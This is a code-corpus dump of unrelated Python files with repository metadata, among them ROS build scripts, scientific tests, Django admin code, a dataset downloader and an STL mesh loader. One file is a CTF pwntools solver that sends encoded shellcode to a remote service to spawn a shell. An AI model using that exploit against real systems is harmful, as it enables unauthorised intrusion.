46988eccec3d8e11f56a6e6e43315d446ded12e7
|
refs/heads/master
| 2020-03-28T21:26:39.339951
| 2018-09-17T16:42:14
| 2018-09-17T16:42:14
| 149,156,738
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,331
|
py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/kinetic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/kinetic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in "/opt/ros/kinetic;/home/jrr/catkin_ws/devel".split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/jrr/catkin_ws/devel/.private/robmovil_msgs/env.sh')
output_filename = '/home/jrr/catkin_ws/build/robmovil_msgs/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
#print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
|
[
"juanreto@gmail.com"
] |
juanreto@gmail.com
|
fc075357702383e855d1b916cb2ef66b92f99214
|
7fdac5209f86de756b9a8123a0911b70738eceeb
|
/pySDC/tests/test_tutorials/test_step_1.py
|
50d02c63344d3cb3b66cf680ff3d9c731d6e2d36
|
[
"BSD-2-Clause"
] |
permissive
|
Parallel-in-Time/pySDC
|
edc66e399f6066effc5aaa376883e88e06b5332b
|
1a51834bedffd4472e344bed28f4d766614b1537
|
refs/heads/master
| 2023-08-30T23:17:56.017934
| 2023-08-30T05:42:00
| 2023-08-30T05:42:00
| 26,165,004
| 30
| 31
|
BSD-2-Clause
| 2023-09-14T06:40:13
| 2014-11-04T10:56:53
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 524
|
py
|
import pytest
@pytest.mark.base
def test_A():
from pySDC.tutorial.step_1.A_spatial_problem_setup import main as main_A
main_A()
@pytest.mark.base
def test_B():
from pySDC.tutorial.step_1.B_spatial_accuracy_check import main as main_B
main_B()
@pytest.mark.base
def test_C():
from pySDC.tutorial.step_1.C_collocation_problem_setup import main as main_C
main_C()
@pytest.mark.base
def test_D():
from pySDC.tutorial.step_1.D_collocation_accuracy_check import main as main_D
main_D()
|
[
"r.speck@fz-juelich.de"
] |
r.speck@fz-juelich.de
|
43019e739fd97a9d55793a78ce5e2ae210eff614
|
8876406eaef11bff8566b54746ca2a7fae3525db
|
/setup.py
|
4c3c25f64e6ea9d2e13bd8210b73d610353940d2
|
[
"BSD-3-Clause"
] |
permissive
|
remibergsma/cs
|
19e0ba4b9ea5c97329e743577d1c8cb10aa593d2
|
de004f6aa08ee8fc0dc342b334a2731b8c5be964
|
refs/heads/master
| 2020-12-28T20:30:43.209507
| 2015-06-03T08:40:13
| 2015-06-03T08:40:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
# coding: utf-8
from setuptools import setup
with open('README.rst', 'r') as f:
long_description = f.read()
setup(
name='cs',
version='0.6.8',
url='https://github.com/exoscale/cs',
license='BSD',
author=u'Bruno Renié',
description=('A simple yet powerful CloudStack API client for '
'Python and the command-line.'),
long_description=long_description,
py_modules=('cs',),
zip_safe=False,
include_package_data=True,
platforms='any',
classifiers=(
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
),
install_requires=(
'requests',
),
extras_require={
'highlight': ['pygments'],
},
test_suite='tests',
entry_points={
'console_scripts': [
'cs = cs:main',
],
},
)
|
[
"brutasse@gmail.com"
] |
brutasse@gmail.com
|
8059df45728dd522b8eaf9bfac6c0b962d0f7839
|
0667af1539008f9c6c0dcde2d3f50e8bbccf97f3
|
/source/rttov_test/profile-datasets-py/standard54lev_nogas/006.py
|
29fa4a49fa333f38babeedbd3040338a5c6cfdcf
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
bucricket/projectMAScorrection
|
bc6b90f07c34bf3e922225b2c7bd680955f901ed
|
89489026c8e247ec7c364e537798e766331fe569
|
refs/heads/master
| 2021-01-22T03:54:21.557485
| 2019-03-10T01:47:32
| 2019-03-10T01:47:32
| 81,468,938
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,904
|
py
|
"""
Profile ../profile-datasets-py/standard54lev_nogas/006.py
file automaticaly created by prof_gen.py script
"""
self["ID"] = "../profile-datasets-py/standard54lev_nogas/006.py"
self["Q"] = numpy.array([ 1.42610400e+00, 2.25740200e+00, 3.03034000e+00,
3.69967200e+00, 4.31610400e+00, 4.78132800e+00,
5.07478900e+00, 5.19176800e+00, 5.24924200e+00,
5.19879300e+00, 5.07691300e+00, 4.97253200e+00,
4.91453000e+00, 4.85289800e+00, 4.77784900e+00,
4.68692800e+00, 4.57725700e+00, 4.47492000e+00,
4.32859300e+00, 4.16293300e+00, 4.00311700e+00,
3.89910100e+00, 3.84313200e+00, 3.83660900e+00,
3.90954900e+00, 4.65101500e+00, 5.63378900e+00,
9.11755200e+00, 1.54746500e+01, 2.64265500e+01,
4.48840100e+01, 7.45942600e+01, 1.42818600e+02,
2.77400700e+02, 4.26100500e+02, 5.67428700e+02,
8.00060400e+02, 1.05809300e+03, 1.34364000e+03,
1.75293000e+03, 2.17224400e+03, 2.70441300e+03,
3.21086700e+03, 3.87373300e+03, 4.48421200e+03,
5.05073700e+03, 5.56837500e+03, 6.03632700e+03,
6.53543000e+03, 6.97678600e+03, 7.36122200e+03,
7.68945200e+03, 7.96208200e+03, 8.17961100e+03])
self["P"] = numpy.array([ 5.00000000e-03, 1.31000000e-02, 3.04000000e-02,
6.44000000e-02, 1.26300000e-01, 2.32400000e-01,
4.05200000e-01, 6.74900000e-01, 1.08010000e+00,
1.66910000e+00, 2.50110000e+00, 3.64620000e+00,
5.18640000e+00, 7.21500000e+00, 9.83680000e+00,
1.31672000e+01, 1.73308000e+01, 2.24601000e+01,
2.86937000e+01, 3.61735000e+01, 4.50430000e+01,
5.54433000e+01, 6.75109000e+01, 8.13744000e+01,
9.71505000e+01, 1.14941500e+02, 1.34831800e+02,
1.56884600e+02, 1.81139400e+02, 2.07609200e+02,
2.36278400e+02, 2.67101200e+02, 3.00000000e+02,
3.34864800e+02, 3.71552900e+02, 4.09889300e+02,
4.49667700e+02, 4.90651600e+02, 5.32576900e+02,
5.75153800e+02, 6.18070600e+02, 6.60996500e+02,
7.03586300e+02, 7.45484100e+02, 7.86327800e+02,
8.25754600e+02, 8.63404700e+02, 8.98927500e+02,
9.31985300e+02, 9.62258700e+02, 9.89451000e+02,
1.01329200e+03, 1.03354400e+03, 1.05000000e+03])
self["T"] = numpy.array([ 190.1948, 201.2227, 211.8073, 223.5081, 236.1925, 248.2361,
259.807 , 268.0701, 270.6029, 261.7915, 253.267 , 245.5053,
238.5085, 232.1688, 228.139 , 225.8658, 224.038 , 222.399 ,
220.8289, 219.3256, 217.9126, 216.7 , 216.7 , 216.7 ,
216.7 , 216.7 , 216.7 , 216.7 , 216.7 , 216.7432,
218.4824, 223.6361, 228.5799, 233.4172, 238.0864, 242.5655,
246.9064, 251.0443, 254.9895, 258.7664, 262.3204, 265.715 ,
268.8759, 271.8706, 274.6321, 277.2104, 279.572 , 281.7077,
283.6703, 285.4074, 286.9218, 288.2157, 289.291 , 290.1495])
self["CTP"] = 500.0
self["CFRACTION"] = 1.0
self["IDG"] = 4
self["ISH"] = 4
self["ELEVATION"] = 0.2
self["S2M"]["T"] = 288.2
self["S2M"]["Q"] = 7488.49927299
self["S2M"]["O"] = 0.0164756909121
self["S2M"]["P"] = 1100.0
self["S2M"]["U"] = -6.0
self["S2M"]["V"] = 0.0
self["S2M"]["WFETC"] = 200000.0
self["SKIN"]["SURFTYPE"] = 0
self["SKIN"]["WATERTYPE"] = 1
self["SKIN"]["T"] = 286.2
self["SKIN"]["SALINITY"] = 37.0
self["SKIN"]["FOAM_FRACTION"] = 0.9
self["SKIN"]["FASTEM"] = numpy.array([ 3. , 5. , 15. , 0.1, 0.3])
self["ZENANGLE"] = 60.0
self["AZANGLE"] = 45.0
self["SUNZENANGLE"] = 0.0
self["SUNAZANGLE"] = 0.0
self["LATITUDE"] = -45.0
self["GAS_UNITS"] = 2
self["BE"] = 0.7
self["COSBK"] = 1.0
self["DATE"] = numpy.array([1976, 7, 1])
self["TIME"] = numpy.array([ 9, 45, 0])
|
[
"bucricket@gmail.com"
] |
bucricket@gmail.com
|
14fb6d53004b22663463f0d74039ca56e3a85c52
|
8bd6b0784de9a1e6a39d0f5f23f2d8fb50c73d49
|
/MethodRefine-Rand/logistics/MethodRefine/logistics_benchmark-low/testing/testing_39.py
|
11af675b7493eb76367a40c8454e27bc462ca562
|
[] |
no_license
|
sysulic/MethodRefine
|
a483d74e65337dff4bc2539ce3caa3bf83748b48
|
adbb22d4663041d853d3132f75032b7561bf605c
|
refs/heads/master
| 2020-09-14T10:45:55.948174
| 2020-05-01T09:13:59
| 2020-05-01T09:13:59
| 223,104,986
| 3
| 2
| null | 2020-04-27T11:01:36
| 2019-11-21T06:33:16
|
Python
|
UTF-8
|
Python
| false
| false
| 1,654
|
py
|
#!/usr/bin/env python
# coding=utf-8
import sys
sys.path.insert(0, './')
from logistic import *
import new_tihtn_planner
state0 = new_tihtn_planner.State('state0')
allow = False
state0.loc = {'truck1':('city1','loc1'),'truck2':('city2','loc1'),'truck3':('city3','loc1'),'truck4':('city4','loc1'),'truck5':('city5','loc2'),'plane1':('city4','loc1'),'pkg1':('city1','loc1'),'pkg2':('city2','loc2'),'pkg3':('city1','loc1'),'pkg4':('city2','loc2'),}
state0.load = {'truck1':False,'truck2':False,'truck3':False,'truck4':False,'truck5':False,'plane1':False,}
state0.plane_nums = 1
new_tihtn_planner.declare_types({'location':[('city1','loc1'),('city1','loc2'),('city2','loc1'),('city2','loc2'),('city3','loc1'),('city3','loc2'),('city4','loc1'),('city4','loc2'),('city5','loc1'),('city5','loc2'),],'truck':['truck1','truck2','truck3','truck4','truck5',],'plane':['plane1',],'pkg':['pkg1','pkg2','pkg3','pkg4',]})
new_tihtn_planner.declare_funs({load_plane:['pkg', 'location', 'plane'],load_truck:['pkg', 'location', 'truck'],by_plane:['plane', 'location'],drive_truck:['truck', 'location'], unload_truck:['pkg', 'location', 'truck'],unload_plane:['pkg', 'location', 'plane']})
new_tihtn_planner.instance()
def execute(completable):
return new_tihtn_planner.pyhop(completable, allow, state0,[('delievery','pkg1',('city4','loc2')),('delievery','pkg2',('city4','loc2')),('delievery','pkg3',('city4','loc1')),('delievery','pkg4',('city4','loc2')),],[[0, 1],[1, 2],[2, 3],], 9)
def add_methods(fun_obj_list):
for fun in fun_obj_list:
new_tihtn_planner.add_method(fun.func_name.split('__')[0], fun)
def reverse_methods():
new_tihtn_planner.reverse_methods()
|
[
"526552330@qq.com"
] |
526552330@qq.com
|
a196daf132349155bf416fdc4b57e570c83a009f
|
7f5ca987c51ffd49b3cba3ffa3e719fc2b8606aa
|
/classtest1.py
|
1160fea16133893b6bfb38a6943c5b03ddd0e5dc
|
[] |
no_license
|
Yao-Phoenix/TrainCode
|
1134b995fddb3d3556fdce05c3219a875b08f6d3
|
2227a70ad5389207af7a84114a5413be3ec2ada2
|
refs/heads/master
| 2020-09-13T03:56:02.235742
| 2019-12-17T03:48:00
| 2019-12-17T03:48:00
| 222,648,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 518
|
py
|
class UserData:
def __init__(self,id,name):
self.id = id
self._name = name
class NewUser(UserData):
@property
def name(self):
return self._name
@name.setter
def name(self, value):
if len(value) <= 3:
print("ERROR")
return
self._name = value
if __name__ == '__main__':
user1 = NewUser(101, 'Jack')
user1.name = 'Lou'
user1.name = 'Jackie'
user2 = NewUser(102, 'Louplus')
print(user1.name)
print(user2.name)
|
[
"493867456@qq.com"
] |
493867456@qq.com
|
e72c98c5a54cc288211b129dfa01220fda615b8c
|
2e935ca936976d2d2bd4e785e2f3f29c63771542
|
/ExPy11205.py
|
fba7158c4dd56aa10949bc9293c983dc7ae0a0a6
|
[] |
no_license
|
zoro6908/PY_acamedy
|
4a370e866fef19f6d2e7697eb809352b6ac703f5
|
460d26639f7bd8cf2486950dc70feae6a2959ca0
|
refs/heads/master
| 2023-04-26T18:10:44.691326
| 2021-05-25T00:11:02
| 2021-05-25T00:11:02
| 298,425,369
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 796
|
py
|
# 파이썬 기초부터 활용까지 (2020.09)
# [12과] 엑셀 작업
# 정렬방식 / 폰트지정 / 선긋기 : styles 객체의 Alignment, Font, Border, Side 클래스 이용
import openpyxl
# from openpyxl.styles import Alignment, Font, Border, Side
from openpyxl.styles import *
wb = openpyxl.Workbook()
ws = wb.active
ws['B3'] = 'Hello'
ws['B3'].font = Font(name = 'HY헤드라인M',
bold = True,
size = 20,
italic=True,
underline='single')
ws['B3'].alignment = Alignment(horizontal='center',
vertical='center')
th = Side(border_style='thin')
db = Side(border_style='double')
ws['B3'].border = Border(top=th, bottom=th, left=db, right=db)
wb.save('ExPy11205.xlsx')
|
[
"zoro6908@naver.com"
] |
zoro6908@naver.com
|
cfe2b636fcb88772b97e8c84b97d910528fa961f
|
1fe8d4133981e53e88abf633046060b56fae883e
|
/venv/lib/python3.8/site-packages/keras/engine/training_v1.py
|
ed875cfba01676d954377d3288f63abbfad0c678
|
[] |
no_license
|
Akira331/flask-cifar10
|
6c49db8485038731ce67d23f0972b9574746c7a7
|
283e7a2867c77d4b6aba7aea9013bf241d35d76c
|
refs/heads/master
| 2023-06-14T16:35:06.384755
| 2021-07-05T14:09:15
| 2021-07-05T14:09:15
| 382,864,970
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 131
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:1eee4b42243c8bc161538de91452850d0486f84aae8e4c4cc9987a3c09eb1557
size 137398
|
[
"business030301@gmail.com"
] |
business030301@gmail.com
|
16d42264f14e0df27c1fd16e5ca5faa78c9249da
|
f504fc2714ed09c3bc1e84dfe67c04af585b8700
|
/Player.py
|
69028cc93fd718f9f797d04ae68fa470de7516b0
|
[] |
no_license
|
MasumTech/OOP-Concept-in-Python
|
04c88a28c2c8bf7ed0231c0da223f216177a07f9
|
7a0a9e214003c759a84e2e28bf8b4702b2e3ced8
|
refs/heads/master
| 2020-12-15T16:06:36.909927
| 2020-01-20T19:04:19
| 2020-01-20T19:04:19
| 235,169,330
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
class Player:
minAge = 18
maxAge = 50
def __init__(self,name,age):
self.name = name
self.age = age
|
[
"masumrezadiu@gmail.com"
] |
masumrezadiu@gmail.com
|
70617f3d7d699cb8fa1781509963bc430072ca0c
|
b3217e2bb6e72fbcb15df99b5c6c10ea4731a5b7
|
/anheng/2020NewYear/pwn/unctf_EasyShellcode/pwn1.py
|
331c88293dc6c22ceb2553d7c395ca0eef05c56f
|
[] |
no_license
|
CrackerCat/ctf-6
|
5704de09eda187e111c7719c71e0a81c5d5c39e3
|
aa7846548451572fe54a380dc8d367a0132ad2ec
|
refs/heads/master
| 2023-01-28T06:18:01.764650
| 2020-12-07T12:05:20
| 2020-12-07T12:05:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,641
|
py
|
#!/usr/bin/python
#coding=utf-8
#__author__:TaQini
from pwn import *
local_file = './pwn1'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = local_libc # '../libc.so.6'
is_local = False
is_remote = False
if len(sys.argv) == 1:
is_local = True
p = process(local_file)
libc = ELF(local_libc)
elif len(sys.argv) > 1:
is_remote = True
if len(sys.argv) == 3:
host = sys.argv[1]
port = sys.argv[2]
else:
host, port = sys.argv[1].split(':')
p = remote(host, port)
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
if is_local: gdb.attach(p,cmd)
ru('What do you want to say?\n')
# generated by aplha3
shellcode = 'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'
debug('b *0x400ca3')
sl(shellcode)
# debug()
# info_addr('tag',addr)
# log.warning('--------------')
p.interactive()
|
[
"742954809@qq.com"
] |
742954809@qq.com
|
2523fb189b949d3b82eaec95c265a2e1f0967c70
|
48faee5b845e43e6c102cb027f43c8b886ecaa5e
|
/accounts/admin.py
|
70ffd71bf72808920c9ff285ffcdb97d3c0f9675
|
[] |
no_license
|
hornLK/LonedayAdmin
|
66c0a8b978967a0144a216f621c872a6d2197229
|
36ba3fe763788423801ad5ab14462624114da804
|
refs/heads/master
| 2022-12-26T06:57:47.675915
| 2018-05-15T13:08:34
| 2018-05-15T13:08:34
| 131,375,220
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,184
|
py
|
from django.contrib import admin
from django import forms
from django.contrib.auth.models import Group
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from accounts.models import UserInfo,Permission,Role
class UserCreationForm(forms.ModelForm):
password1 = forms.CharField(label='Password',widget=forms.PasswordInput)
password2 = forms.CharField(label='Password confirmation',widget=forms.PasswordInput)
class Meta:
model = UserInfo
fields = ('email','nickname')
def clean_Password2(self):
password1 = self.cleaned_data.get("password1",None)
password2 = self.cleaned_data.get("password2",None)
if password1 and password2 and password1 != password2:
raise forms.ValidationError("密码不匹配")
return password2
def save(self,commit=True):
user = super().save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.save()
return user
class UserChangeForm(forms.ModelForm):
password = ReadOnlyPasswordHashField()
class Meta:
model = UserInfo
fields = ('email','nickname','role','is_active','is_superuser')
def clean_password(self):
return self.initial["password"]
class UserAdmin(BaseUserAdmin):
form = UserChangeForm
add_form = UserCreationForm
list_display = ('email','nickname','role','is_active','is_superuser')
list_filter = ('is_superuser','is_active','role')
fieldsets = (
('基础',{'fields':('email','nickname')}),
('权限',{'fields':('role','is_superuser')}),
('状态',{'fields':('is_active',)})
)
add_fieldsets = (
(None,{
'classes':('wide',),
'fields':('email','nickname','password1','password2','role','is_active','is_superuser')
}
),
)
search_fields = ('email',)
ordering = ('email',)
filter_horizontal = ()
# Register your models here.
admin.site.register(UserInfo,UserAdmin)
admin.site.register(Role)
admin.site.register(Permission)
admin.site.unregister(Group)
|
[
"bjlkq546449541@gmail.com"
] |
bjlkq546449541@gmail.com
|
dd095298a9afc68335157cb824950644c08ba41d
|
aee144770c8f4ec5987777aebe5b064e558fc474
|
/doc/integrations/pytorch/parlai/tasks/squad2/build.py
|
094ee646331483740208e88da52a11b78a65a498
|
[
"CC-BY-SA-3.0",
"MIT",
"Apache-2.0",
"AGPL-3.0-only"
] |
permissive
|
adgang/cortx
|
1d8e6314643baae0e6ee93d4136013840ead9f3b
|
a73e1476833fa3b281124d2cb9231ee0ca89278d
|
refs/heads/main
| 2023-04-22T04:54:43.836690
| 2021-05-11T00:39:34
| 2021-05-11T00:39:34
| 361,394,462
| 1
| 0
|
Apache-2.0
| 2021-04-25T10:12:59
| 2021-04-25T10:12:59
| null |
UTF-8
|
Python
| false
| false
| 1,480
|
py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Download and build the data if it does not exist.
import parlai.core.build_data as build_data
import os
from parlai.core.build_data import DownloadableFile
RESOURCES = [
DownloadableFile(
'https://rajpurkar.github.io/SQuAD-explorer/dataset/train-v2.0.json',
'train-v2.0.json',
'68dcfbb971bd3e96d5b46c7177b16c1a4e7d4bdef19fb204502738552dede002',
zipped=False,
),
DownloadableFile(
'https://rajpurkar.github.io/SQuAD-explorer/dataset/dev-v2.0.json',
'dev-v2.0.json',
'80a5225e94905956a6446d296ca1093975c4d3b3260f1d6c8f68bc2ab77182d8',
zipped=False,
),
]
def build(opt):
dpath = os.path.join(opt['datapath'], 'SQuAD2')
version = None
if not build_data.built(dpath, version_string=version):
print('[building data: ' + dpath + ']')
if build_data.built(dpath):
# An older version exists, so remove these outdated files.
build_data.remove_dir(dpath)
build_data.make_dir(dpath)
# Download the data.
for downloadable_file in RESOURCES:
downloadable_file.download_file(dpath)
# Mark the data as built.
build_data.mark_done(dpath, version_string=version)
|
[
"noreply@github.com"
] |
adgang.noreply@github.com
|
5c38ea20e9d5d8f3e31e5d4bd17e1440db4f3d73
|
c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce
|
/flask/flaskenv/Lib/site-packages/tensorflow/contrib/keras/api/keras/metrics/__init__.py
|
6e02c1674ee83334cbe7062ab4c5e87eda1d47c4
|
[] |
no_license
|
AhsonAslam/webapi
|
54cf7466aac4685da1105f9fb84c686e38f92121
|
1b2bfa4614e7afdc57c9210b0674506ea70b20b5
|
refs/heads/master
| 2020-07-27T06:05:36.057953
| 2019-09-17T06:35:33
| 2019-09-17T06:35:33
| 208,895,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:0a12f3b7372d5432f0d79f402b4769a59e1d06dc405da5210bbf689cb36fa0e2
size 2230
|
[
"github@cuba12345"
] |
github@cuba12345
|
67ccb1475ec05c04027a13cfadd67b4b28e9004e
|
cb8d1db4af4401b019775132fe92f3eae4cb92df
|
/_unittests/ut_cli/test_cli_file_helper.py
|
b24c031f8bd1ec2a412e0fabd6edd470918e6747
|
[
"MIT"
] |
permissive
|
Pandinosaurus/pyquickhelper
|
041d6c6d2832845bd89027ffaab333239efc3959
|
860ec5b9a53bae4fc616076c0b52dbe2a1153d30
|
refs/heads/master
| 2023-07-24T12:27:25.700277
| 2023-07-17T07:02:34
| 2023-07-17T07:02:34
| 169,426,142
| 0
| 0
|
MIT
| 2023-07-17T07:53:04
| 2019-02-06T15:17:53
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,549
|
py
|
"""
@brief test tree node (time=7s)
"""
import sys
import os
import unittest
from io import StringIO
from pyquickhelper.loghelper import fLOG, BufferedPrint
from pyquickhelper.pycode import get_temp_folder
from pyquickhelper.__main__ import main
class TestCliFileHelper(unittest.TestCase):
def test_cli_file_helper(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
this = os.path.abspath(os.path.dirname(__file__))
st = BufferedPrint()
main(args=["ls", "-f", this, "-p",
".*[.]py", "-r", "f"], fLOG=st.fprint)
res = str(st)
self.assertIn(".py", res)
this = os.path.abspath(os.path.dirname(__file__))
st = BufferedPrint()
main(args=["ls", "-f", this, "-p", ".*[.]py", "-r",
"f", '-n', 'pycache', '-fu', '1'],
fLOG=st.fprint)
res = str(st)
self.assertIn(".py", res)
self.assertNotIn("pycache", res)
this = os.path.abspath(os.path.dirname(__file__))
st = BufferedPrint()
main(args=["ls", "-f", this, "-p", ".*[.]py", "-r",
"f", '-n', 'pycache', '-fu', '1', '-s', "test_(.*)",
'-su', 'unit_\\1'],
fLOG=st.fprint)
res = str(st)
self.assertIn(".py", res)
self.assertNotIn("pycache", res)
self.assertNotIn("test_parser", res)
self.assertIn("unit_parser", res)
if __name__ == "__main__":
unittest.main()
|
[
"xavier.dupre@gmail.com"
] |
xavier.dupre@gmail.com
|
51142e7b8d3e124bfee304c104a86f3a4b396682
|
f8ffa8ff257266df3de9d20d95b291e393f88434
|
/Python from scratch/Warsztaty/Warsztaty01/zad01.py
|
33e1c3878f88c9c49cec628e9e7d3339b1b0c28c
|
[] |
no_license
|
janiszewskibartlomiej/Python_Code_Me_Gda
|
c0583c068ef08b6130398ddf93c3a3d1a843b487
|
7568de2a9acf80bab1429bb55bafd89daad9b729
|
refs/heads/master
| 2020-03-30T05:06:26.757033
| 2020-03-02T08:53:28
| 2020-03-02T08:53:28
| 150,781,356
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 564
|
py
|
ekwipunek = {'pieniądze':158.40,
'sprzęt':['kompas', 'latarka', 'śpiwór'],
'prowiant':['jabłko', 'woda', 'batonik', 'batonik']}
print('Lista ekwipunku to: ', ekwipunek)
print('Harcesz kupił karimatę za 29.99 zł')
ekwipunek['pieniądze'] = ekwipunek['pieniądze'] - 29.99
ekwipunek['sprzęt'].append('karimata')
print(ekwipunek)
print('Harcerz zjadł batonik')
ekwipunek['prowiant'].remove('batonik')
print(ekwipunek['prowiant'])
print('Harcerz ma 7 przedmiotów w plecaku: ', ekwipunek['sprzęt'] + ekwipunek['prowiant'])
|
[
"janiszewski.bartlomiej@gmail.com"
] |
janiszewski.bartlomiej@gmail.com
|
1c6026e1dbb38669cf355d1ec7f80ae280b72c1f
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_wagering.py
|
3ad88745da9973ac13e723d2d10defa24d8be66f
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 235
|
py
|
from xai.brain.wordbase.nouns._wager import _WAGER
#calss header
class _WAGERING(_WAGER, ):
def __init__(self,):
_WAGER.__init__(self)
self.name = "WAGERING"
self.specie = 'nouns'
self.basic = "wager"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
db604c59ed67ae9680c1fe9108853daaf57af74b
|
3d5958a79c02fe885324956bfead037999c73c7a
|
/trimesh/io/stl.py
|
32912d8f687bcee9809cc8e06c6380fe138bfba6
|
[
"MIT"
] |
permissive
|
Mambix/trimesh
|
def56d14994076cfcc24e3c3d67d5e27bea5bb49
|
99d01909a1f4cf56d777a8339a6c2443cf37d6b8
|
refs/heads/master
| 2020-05-27T21:20:11.800221
| 2017-03-02T00:57:53
| 2017-03-02T00:57:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,643
|
py
|
import numpy as np
# the exception raised if an STL file object doesn't match its header
class HeaderError(Exception):
pass
# define a numpy datatype for the data section of a binary STL file
_stl_dtype = np.dtype([('normals', np.float32, (3)),
('vertices', np.float32, (3, 3)),
('attributes', np.uint16)])
# define a numpy datatype for the header of a binary STL file
_stl_dtype_header = np.dtype([('header', np.void, 80),
('face_count', np.int32)])
def load_stl(file_obj, file_type=None):
'''
Load an STL file from a file object.
Arguments
----------
file_obj: open file- like object
file_type: not used
Returns
----------
loaded: kwargs for a Trimesh constructor with keys:
vertices: (n,3) float, vertices
faces: (m,3) int, indexes of vertices
face_normals: (m,3) float, normal vector of each face
'''
# save start of file obj
file_pos = file_obj.tell()
try:
# check the file for a header which matches the file length
# if that is true, it is almost certainly a binary STL file
# if the header doesn't match the file length a HeaderError will be
# raised
return load_stl_binary(file_obj)
except HeaderError:
# move the file back to where it was initially
file_obj.seek(file_pos)
# try to load the file as an ASCII STL
# if the header doesn't match the file length a HeaderError will be
# raised
return load_stl_ascii(file_obj)
def load_stl_binary(file_obj):
'''
Load a binary STL file from a file object.
Arguments
----------
file_obj: open file- like object
Returns
----------
loaded: kwargs for a Trimesh constructor with keys:
vertices: (n,3) float, vertices
faces: (m,3) int, indexes of vertices
face_normals: (m,3) float, normal vector of each face
'''
header = np.fromstring(file_obj.read(84), dtype=_stl_dtype_header)
# now we check the length from the header versus the length of the file
# data_start should always be position 84, but hard coding that felt ugly
data_start = file_obj.tell()
# this seeks to the end of the file
# position 0, relative to the end of the file 'whence=2'
file_obj.seek(0, 2)
# we save the location of the end of the file and seek back to where we
# started from
data_end = file_obj.tell()
file_obj.seek(data_start)
# the binary format has a rigidly defined structure, and if the length
# of the file doesn't match the header, the loaded version is almost
# certainly going to be garbage.
data_ok = (
data_end - data_start) == (header['face_count'] * _stl_dtype.itemsize)
# this check is to see if this really is a binary STL file.
# if we don't do this and try to load a file that isn't structured properly
# we will be producing garbage or crashing hard
# so it's much better to raise an exception here.
if not data_ok:
raise HeaderError('Binary STL has incorrect length in header!')
# all of our vertices will be loaded in order due to the STL format,
# so faces are just sequential indices reshaped.
faces = np.arange(header['face_count'] * 3).reshape((-1, 3))
blob = np.fromstring(file_obj.read(), dtype=_stl_dtype)
result = {'vertices': blob['vertices'].reshape((-1, 3)),
'face_normals': blob['normals'].reshape((-1, 3)),
'faces': faces}
return result
def load_stl_ascii(file_obj):
'''
Load an ASCII STL file from a file object.
Arguments
----------
